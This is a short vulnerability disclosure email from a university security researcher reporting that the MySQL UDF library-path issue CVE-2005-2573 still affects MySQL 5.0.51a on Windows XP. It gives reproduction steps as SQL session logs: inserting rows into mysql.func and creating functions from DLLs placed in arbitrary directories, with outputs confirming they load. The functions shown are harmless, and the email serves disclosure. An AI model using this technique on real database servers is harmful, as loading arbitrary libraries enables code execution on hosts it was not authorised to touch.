Hello,
CVE-2005-2573 is reported for MySQL 4.1.x before 4.1.13 and MySQL 5.0
before 5.0.7. However. I tested this vulnerability in MySQL 5.0.51a on
Windows xp sp2, and found this version vulnerable too.
According to CVE-2008-4098, that is reported because of an incomplete fix for CVE-2008-4097, i think this vulnerability should be reported again for an incomplete fix.
I tested CVE-2005-2573 in MySQL 5.0.51a and windows XP again and found this vulnerability isn't fixed. Here is my done steps for executing this vulnerability.
Example:
1) mysql> INSERT INTO mysql.func (name,dl) VALUES ('lib_mysqludf_udf','C:\Program F
iles\MySQL\MySQL Server 5.0\lib/lib_mysqludf_udf.dll') ;
Query OK, 1 row affected (0.00 sec)
2) mysql> CREATE FUNCTION lib_mysqludf_udf_info
-> RETURNS STRING
-> SONAME 'lib_mysqludf_udf.dll'
-> ;
Query OK, 0 rows affected (0.02 sec)
3) mysql> select lib_mysqludf_udf_info();
+--------------------------------+
| lib_mysqludf_udf_info() |
+--------------------------------+
| lib_mysqludf_sys version 0.0.2 |
+--------------------------------+
1 row in set (0.00 sec)
(Also, Saving the dll file in another directory (i.e. E:\..\..\), gives the same result)
mysql> delete from func where name='lib_mysqludf_udf' and dl='C:\Program Files\My
SQL\MySQL Server 5.0\lib/lib_mysqludf_udf.dll' ;
Query OK, 1 row affected (0.00 sec)
mysql> INSERT INTO mysql.func (name,dl) VALUES ('lib_mysqludf_udf','E:\project\l
ib_mysqludf_udf\release/lib_mysqludf_udf.dll') ;
Query OK, 1 row affected (0.00 sec)
mysql> CREATE FUNCTION udf_arg_count
-> RETURNS INTEGER
-> SONAME 'lib_mysqludf_udf.dll'
-> ;
Query OK, 0 rows affected (0.00 sec)
mysql> select udf_arg_count(1,2,3,4);
+------------------------+
| udf_arg_count(1,2,3,4) |
+------------------------+
| 4 |
+------------------------+
1 row in set (0.00 sec)
Please verify and send your opion about this.
I 'm waitting your mail.
Regards
Rahimeh.Khodadadi
Network Security Center of Sharif University of Iran
